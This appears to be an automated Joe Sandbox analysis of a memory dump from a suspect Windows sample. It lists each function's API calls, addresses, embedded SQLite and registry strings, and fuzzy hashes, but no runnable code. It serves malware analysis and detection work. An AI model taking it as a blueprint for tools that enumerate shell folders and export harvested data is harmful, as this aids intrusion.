                                                                                                                                                                                                                                    • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                    • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                                    • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409042
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 265355444-0
                                                                                                                                                                                                                                    • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4131475296-0
                                                                                                                                                                                                                                    • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                                                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                    • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                                    • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFilefreememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2507021081-0
                                                                                                                                                                                                                                    • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00417544
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00417562
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4131324427-0
                                                                                                                                                                                                                                    • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PathTemp$free
                                                                                                                                                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                                    • API String ID: 924794160-1420421710
                                                                                                                                                                                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                                    • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                                    • String ID: General
                                                                                                                                                                                                                                    • API String ID: 999786162-26480598
                                                                                                                                                                                                                                    • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                                                                                                    • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                                    • API String ID: 0-1953309616
                                                                                                                                                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                    • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2241099983-0
